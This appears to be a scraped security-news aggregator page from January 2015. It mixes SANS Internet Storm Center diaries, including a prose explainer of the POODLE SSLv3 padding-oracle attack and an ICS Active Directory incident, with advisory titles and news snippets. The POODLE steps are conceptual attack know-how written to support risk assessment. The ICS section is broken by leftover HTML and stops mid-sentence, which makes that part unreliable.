Hi, if you have some logs from the following subnets to your infrastructure and you are able to share, could you?

  • (although Ill take /16)

If you cant share logs or packets, maybe you could send me a source IP and Destination Port. (just use the contact form or send them direct to markh.isc (at) gmail.com )

The above are all active on SSH and DNS, just trying to see if there is anything else and if so what and in which part of the world.



(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Info-ZIP UnZip CVE-2014-8141 Out of Bounds Read Heap Buffer Overflow Vulnerability
[SECURITY] [DSA 3121-1] file security update
Recon 2015 Call For Papers - June 19 - 21, 2015 - Montreal, Canada
[ MDVSA-2015:018 ] asterisk
[ MDVSA-2015:017 ] libevent
Info-ZIP UnZip CVE-2014-8139 Remote Heap Buffer Overflow Vulnerability
Info-ZIP UnZip CVE-2014-8140 Out of Bounds Write Heap Buffer Overflow Vulnerability

OpenSSL just released a new version of the popular SSL/TLS toolkit.

This release fixes 2 moderate and 6 low vulnerabilities. Luckily, both moderate vulnerabilities can only lead to Denial of Service. The other 6 low vulnerabilities are either difficult to exploit or of unknown impact so while you should update (as always) it appears for now that there is no need to rush with this upgrade.

More information is available at http://openssl.org/news/secadv_20150108.txt.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

If you're running an Asus wireless router, chances are good that someone inside your network can take full administrative control of it thanks to a currently unpatched vulnerability in virtually all versions of the firmware, a security researcher said.

While the vulnerability isn't as serious as those that allow hackers on the Internet at large to compromise the devices, it's nonetheless concerning. People with administrative control can reroute everyone connected to malicious websites and possibly install alternate or even malicious firmware updates.

"I trust people that join my network to some degree, but I don't want them to be able to reconfigure the router," Joshua Drake, research director at Accuvant and the person who brought the vulnerability to light Thursday, told Ars. "I can't prevent them without this getting fixed (short of the workaround)."

Read 4 remaining paragraphs | Comments


On Thursday, the recent Lizard Squad tour of Internet infamy continued as the hacking group took credit for a distributed denial of service (DDoS) attack against the imageboard site 8chan. As of publication, 8chan.co is still inaccessible throughout the United States. Japanese sibling site 2ch.net, which also suffered an outage, was restored once 8chan's servers were "separated from the rest of the network," according to 8chan founder Fredrick Brennan's Twitter account.

In claiming credit for the attack, Lizard Squad pointed to its own recently launched service known as Lizard Stresser, which allows third parties to essentially hire Lizard Squad to DDoS the website of their choice. Users can pay anywhere from $6 to $500 to access the attack service, which then offers attack bursts that can last as long as 500 minutes concurrently.

Investigative reporter Brian Krebs recently profiled Lizard Squad in a story headlined Lizard Kids: A Long Trail of Fail. He said the group's Stresser service was lifted in its entirety from another more established DDoS-for-hire site. He also found Lizard Squad inadvertently exposed information about all 1,700 of its registered users.

Read 8 remaining paragraphs | Comments

[ MDVSA-2015:014 ] libjpeg
[ MDVSA-2015:013 ] znc
[ MDVSA-2015:012 ] jasper
[ MDVSA-2015:011 ] nail
[ MDVSA-2015:006 ] mediawiki
[ MDVSA-2015:007 ] unrtf

New research indicates cybersecurity skills shortage will be a big problem in 2015
Network World
As part of its global research project, ESG asked 591 IT and infosec professionals if their organizations planned to add headcount in 2015. It turns out that half of all organizations plan to add a significant or small number of new IT staff positions ...

LinuxSecurity.com: Updated mediawiki packages fix security vulnerabilities: In MediaWiki before 1.23.8, thumb.php outputs wikitext message as raw HTML, which could lead to cross-site scripting. Permission to edit MediaWiki namespace is required to exploit this. [More...]
LinuxSecurity.com: bsd-mailx could be made to run programs if it parsed a specially craftedemail address.
LinuxSecurity.com: Exiv2 could be made to crash if it opened a specially crafted file.
LinuxSecurity.com: NSS could be made to expose sensitive information over the network.
LinuxSecurity.com: run-mailcap could be made to run programs as your login if it opened aspecially crafted file.
LinuxSecurity.com: Updated glibc packages that fix two security issues and two bugs are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security [More...]
Cisco Jabber Guest CVE-2014-8025 Multiple Information Disclosure Vulnerabilities
Cisco Jabber Guest Server CVE-2014-8026 Multiple Cross Site Scripting Vulnerabilities
ManageEngine Desktop Central CVE-2014-7862 Remote Security Bypass Vulnerability

Information Security Analytics
Help Net Security
The point of data analytics is to provide usable business intelligence. The field of analytics is wide, and there are certain methods that work better for discovering security breaches than others. The authors concentrate on those, and on the tools ...


Posted by InfoSec News on Jan 08


Threat Level

The Obama administration has been tightlipped about its controversial
naming of the North Korean government as the definitive source of the hack
that eviscerated Sony Pictures Entertainment late last year. But FBI
director James Comey is standing by the bureau’s conclusion, and has...

Posted by InfoSec News on Jan 08


By Charlie Osborne
Zero Day
ZDNet News
January 7, 2015

Twitter has opened up suspicious activity tracker AnomalyDetection to

The social media giant said on Tuesday the tool, dubbed AnomalyDetection,
is used by the firm's team to detect unusual traffic events including
traffic spikes and surges, as well as the presence of spam bots. In the
world of...

Posted by InfoSec News on Jan 08


JAN 8, 2015

NEW YORK – The U.S. intelligence chief revealed Wednesday that during a
secret mission to Pyongyang two months ago he dined with the North Korean
general believed responsible for hacking Sony’s Hollywood studio.

Director of National Intelligence James Clapper gave a riveting account of
the visit at a New...

Posted by InfoSec News on Jan 08


By Dan Goodin
Ars Technica
Jan 7, 2015

Securing Macs against stealthy malware infections could get more
complicated thanks to a new proof-of-concept exploit that allows attackers
with brief physical access to covertly replace the firmware of most
machines built since 2011.

Once installed, the bootkit—that is, malware that replaces...

Posted by InfoSec News on Jan 08


By Gbade Ogunwale and Faith Yahaya
The Nation
Jan 7, 2015

THE Department of State Security (DSS) has alleged that the All
Progressives Congress (APC) attempted to hack into the data base of the
Independent National Electoral Commission (INEC), with the intention of
disrupting the electoral process.

DSS Spokesperson Marilyn Ogar, who briefed reporters in Abuja...

Posted by InfoSec News on Jan 08


January 07, 2015

Hasan Palaz, the former vice president of the Scientific and Technological
Research Council of Turkey (TÜBİTAK), said in comments on a Bugün TV
network program that TÜBİTAK has neither the jurisdiction nor the
necessary equipment to hack into phones protected with encryption...

One of the biggest security announcements in the last year was definitely the POODLE (Padding Oracle On Downgraded Legacy Encryption) vulnerability, which marked the real end of SSLv3. In a contrast with many other previously identified vulnerabilities in encryption algorithms used by SSLv3, this vulnerability is viable, and can be exploited by an attacker without jumping over too many obstacles or requiring large resources the POODLE vulnerability is real.

While this raised quite a bit of panic (in some cases the panic was justified) it also raised quite a bit of dust where it should not have had. The goal of this diary is therefore to clear things up a bit, to allow you to make proper risk assessment on moving away from SSLv3 please do add comments and your experiences (and any corrections, if you find errors).

A little refresher

First, though, a little refresher on how the POODLE vulnerability works. The original paper is available at https://www.openssl.org/~bodo/ssl-poodle.pdf, however I will explain couple of details which are, in my opinion, crucial for this attack and that maybe have not been stressed out as they should have in this paper (my personal opinion is that the steps related to the attack should have been better explained since that would allow people to easily assess the risk).

The vulnerability exists in the fact that, when a CBC encryption algorithms is used, SSLv3 does not cover padding with MAC (Message Authentication Code). Additionally (and this is the key), when there is an entire block of padding, SSLv3 checks only the last byte in the padding block. All other, previous bytes in that block are ignore and the value of the last byte must be equal to the block size (i.e. 15, when the block size is 16 bytes).

If an attacker wants to exploit this vulnerability, he first must perform the following actions:

  • Successfully run a Man-in-the-Middle attack against the victim,
  • Downgrade connection to SSLv3, if TLS is used as well, for example,

If the requirements above have been fulfilled, the attack is relatively simple, and the attacker must do the following:

  • Position the byte he wants to recover as the last byte of a block. This is a critical requirement as we will see later.
  • Copy that block as the last (padding) block.

Now the attacker uses the server as the oracle depending on messages received back. The server will try to decrypt the message and when decrypting the last block, due to the CBC encryption algorithm, after the decryption, the last byte will be XOR-ed with the last byte of the previous block. As we used an entire block of padding, the attacker knows that result of this process must be 15. In other words, if the decryption was successful, the attacker can obtain the plain text value of that byte since he can easily calculate it: the decrypted byte = 15 XOR (the last byte of the previous block).

How does the attacker know if the decryption was successful? Its simple: by observing network traffic from the server:

  • If the decryption failed (and this means that the result was not 15), the attacker will see Alert Code 21, which means Decryption failed (the description says: Decryption of a TLSCiphertext record is decrypted in an invalid way: either it was not an even multiple of the block length or its padding values, when checked, were not correct. This message is always fatal.)
  • If the decryption was successful, the attacker can decrypt the byte. The action that the request will cause does not really matter.

All the attacker needs to do now is cause the victim to issue multiple requests. In average he will need 256 request to decrypt a single byte (but notice that it might take him much more or less requests to do this). By causing the victim to issue arbitrary requests, the attacker decrypts his wanted data (usually a session cookie in web applications) byte by byte.

Practicality of POODLE attacks

As you can see in the previous section, there is a number of requirements that the attacker needs to fulfill to execute POODLE attacks. One of the most important is to make the victim issue arbitrary requests to the server. The attacker must somehow be able to influence these requests the byte he wants to decrypt must be the last byte in a block.
With web applications this is relatively easy since the attacker must be in a MitM position anyway, he can make the victims browser issue such special requests (for more details see the original paper).

However, and this is the crucial point of assessing the risk of POODLE what happens if the attacker cannot influence such requests? Well, according to current information, he will be able to decrypt only single pre-positioned bytes.

While this is still bad, the risk might be lower than with a standard web application. And this is the main point of assessing the risk: in last couple of months Ive seen simply too many cases when an auditor (or a penetration tester) ran a tool which reported that SSLv3 is enabled and blindly marked this as a critical vulnerability that has to be mitigated as soon as possible.

One of the typical cases of such detections are client-server applications that use SSLv3 to protect data, but that do not allow the attacker to modify the requests (for example: monitoring systems). Such systems always issue same requests, and they do this automatically so the attacker cannot modify the request (the plain text version of it), as he can with web applications.

So, to wrap up this already long diary always assess risk properly and do not accept results of automated scanners blindly. While the POODLE vulnerability is indeed a severe and critical vulnerability, and we should move to TLS (v1.2 if possible), the migration should be staged and carefully planned.


(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security patch management is a delicate issue in critical infrastructure. This is caused for the specific configuration, operating system version and related software required by the ICS platform. Most support contracts states that any modification outside the parameters stated by the manufacturer will void the relation and release manufacturer and seller from any responsibility about malfunction and any consequence on the industrial process.

Unfortunately, when we talk about ICS software running on windows the restriction is often applied to domain controllers as well. The case I will cover on the present diary is about an incident on a Water ICS system controlled by Emerson Open Enterprise installation and how all the servers located in the domain got modified their attributes on the domain controller without being able to tell what changes were executed.

Before this incident happened, all domain controllers and servers were configured to log the required security events to Arcsight. Now we need to find out which of the billions of logs we need to search. For this installation, we are talking about 3000 events per second. The incident began when the Open Enterprise HMI System began to loose readings from all the RTUs and after a couple of minutes it was unable to send commands to any RTU.

Since we are talking here about Windows Server 2012R2, There is an interesting repository were all event IDs for Windows 8 and Windows 2012 can be located. After looking inside the repository, the following events are interesting for searching inside the arcsight database:

="15" style="height: 15px; width: 113px; text-align: center;">Category
Subcategory Event ID Message Summary
DS Access Directory Service Changes 5136 A directory service object was modified.
DS Access Directory Service Changes 5137 A directory service object was created.
DS Access Directory Service Changes 5138 A directory service object was undeleted.
DS Access Directory Service Changes 5139 A directory service object was moved.
DS Access Directory Service Changes 5141 A directory service object was deleted.

Event ID 5136 states that the attribute field must be filled with the information changed for the specific object. Check the following evidence collected:

Log Name:      SecuritySource:        Microsoft-Windows-Security-AuditingDate:          23/11/2014 1:30:42 PMEvent ID:      5136Task Category: Directory Service ChangesLevel:         InformationKeywords:      Audit SuccessUser:          N/AComputer:      DC.Domain.comDescription:A directory service object was modified. Subject: Security ID:  Domain\Administrator Account Name:  Administrator Account Domain:  Domain Logon ID:  0x5f8a3Directory Service: Name: Domain.local Type: Active Directory Domain Services Object: DN: CN=XXXXXXX,OU=XXXXX,DC=Domain,DC=Com GUID: CN=XXXXX,OU=XXXXX,DC=Domain,DC=Com Class: XXXXX Attribute: XXXXXXXXXXX: YYYYYYYY Syntax (OID): X.X.X.X Value: ZZZZZZZZZZZZZZ Operation: Type: Value Deleted Correlation ID: {ba5fa2fe-9a61-12fa-1b95-3bf03643b4e2}">For some reason, the attribute field was missing and we could not know what attributes were deleted. After researching on this issue, we found it">Want to implement patch management in your organization? Check the specific NIST guide for more information.

Manuel Humberto Santander Pelez
SANS Internet Storm Center - Handler
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Internet Storm Center Infocon Status